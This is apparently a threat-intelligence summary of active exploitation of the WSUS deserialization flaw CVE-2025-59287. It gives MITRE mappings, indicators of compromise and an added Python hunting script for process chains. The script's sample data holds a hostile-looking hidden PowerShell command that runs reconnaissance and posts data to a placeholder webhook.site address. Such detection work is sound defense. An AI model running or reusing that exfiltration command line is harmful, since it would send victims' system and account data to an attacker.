A critical unauthenticated RCE vulnerability in Windows Server Update Services (CVE-2025-59287) was actively exploited in the wild shortly after Microsoft released an emergency patch on Oct. 23, 2025, prompting CISA to add it to the KEV catalog. Unit 42 observed exploitation chains leveraging unsafe deserialization via GetCookie() and ReportingWebService endpoints, with attackers using exposed WSUS instances on ports 8530/8531 for initial access. #CVE-2025-59287 #WindowsServerUpdateServices
Keypoints
- Critical unauthenticated RCE in WSUS (CVE-2025-59287) with CVSS 9.8 — allows remote code execution as SYSTEM on servers with the WSUS role enabled.
- Microsoft’s October Patch Tuesday fix was incomplete; an out-of-band emergency update was released on Oct. 23, 2025.
- Active exploitation observed within hours of the emergency patch; CISA added the vulnerability to its KEV Catalog on Oct. 24.
- Vulnerability stems from unsafe deserialization of untrusted data via BinaryFormatter and SoapFormatter targeting GetCookie() and ReportingWebService endpoints.
- Attackers targeted internet-exposed WSUS instances on TCP ports 8530 (HTTP) and 8531 (HTTPS), with Cortex Xpanse identifying ~5,500 exposed instances.
- Observed post-exploit activity includes PowerShell execution via wsusservice.exe or w3wp.exe parent processes, internal reconnaissance (whoami, net user /domain, ipconfig /all), and exfiltration to a Webhook.site endpoint.
- Interim mitigations include disabling the WSUS Server Role or blocking inbound TCP 8530/8531 until patches can be applied; Unit 42 provides hunting queries and incident response support.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers exploited a remote, unauthenticated RCE in WSUS (CVE-2025-59287) by sending specially crafted requests to GetCookie() and ReportingWebService endpoints causing unsafe deserialization (“…sending a specially crafted request to the GetCookie() endpoint… causes the server to improperly deserialize an AuthorizationCookie object…”).
- [T1218] Signed Script Proxy Execution – Malicious PowerShell commands executed via legitimate parent processes (wsusservice.exe/w3wp.exe → cmd.exe → cmd.exe → powershell.exe) to run post-exploitation scripts (“…wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe”).
- [T1083] File and Directory Discovery / [T1082] System Information Discovery – Initial reconnaissance commands run to map the environment, such as whoami, net user /domain, and ipconfig /all (“…the initial payload executes commands to gather intelligence on the internal network environment, including whoami, net user /domain, and ipconfig /all”).
- [T1041] Exfiltration Over Web Service – Collected information was exfiltrated to an attacker-controlled Webhook.site endpoint using Invoke-WebRequest or curl.exe (“…exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload that attempts Invoke-WebRequest and falls back to curl.exe…”).
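As an added example (not code from the Unit 42 report), a minimal hunt over constructed process-creation events that flags powershell.exe descended from wsusservice.exe or w3wp.exe and annotates the reconnaissance commands and Webhook.site exfiltration pattern listed above. The event fields, sample command lines and the webhook id are assumptions and placeholders.

```python
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}          # legitimate WSUS parents abused here
RECON = ("whoami", "net user /domain", "ipconfig /all")  # recon commands named in the report
EXFIL = ("invoke-webrequest", "curl.exe", "webhook.site")  # exfil indicators named in the report

# Constructed process-creation events, not real telemetry. The webhook id is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "w3wp.exe", "cmdline": "w3wp.exe -ap WsusPool"},
    {"pid": 101, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe /c cmd.exe /c powershell ..."},
    {"pid": 102, "ppid": 101, "image": "cmd.exe", "cmdline": "cmd.exe /c powershell ..."},
    {"pid": 103, "ppid": 102, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c whoami; net user /domain; ipconfig /all; "
                "Invoke-WebRequest -Uri http://webhook.site/PLACEHOLDER-ID -Method POST"},
    {"pid": 200, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    # Benign admin use: same command, but not descended from a WSUS process, so not flagged.
    {"pid": 201, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell.exe -c ipconfig /all"},
]

def ancestry(events, pid):
    """Return image names from the process itself up to the root: [self, parent, ...]."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # 'seen' guards against pid-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain

def hunt(events):
    """Flag powershell.exe whose ancestors include a WSUS process; annotate recon/exfil."""
    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        chain = ancestry(events, e["pid"])
        if not WSUS_PARENTS & set(chain[1:]):     # inspect ancestors only, not the process itself
            continue
        cmd = e["cmdline"].lower()
        hits.append({
            "pid": e["pid"],
            "chain": " -> ".join(reversed(chain)),
            "recon": [c for c in RECON if c in cmd],
            "exfil": any(k in cmd for k in EXFIL),
        })
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

On real telemetry, feed Sysmon Event ID 1 or EDR process-start records into the same shape; the ancestor check matters more than the command strings, since legitimate admins also run ipconfig /all.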
Indicators of Compromise
- [URL] Exfiltration endpoint – hxxp://webhook[.]site/22b6b8c8-2e07-4878-a681-b772e569aa6a
- [Ports] Publicly exposed WSUS service ports – TCP 8530 (HTTP), TCP 8531 (HTTPS)
- [Processes / Commands] Malicious process chains and commands – wsusservice.exe → cmd.exe → powershell.exe; w3wp.exe → cmd.exe → powershell.exe; observed commands: whoami, net user /domain, ipconfig /all
- [Asset Count] Internet-exposed instances – ~5,500 WSUS instances identified by Cortex Xpanse
Read more: https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/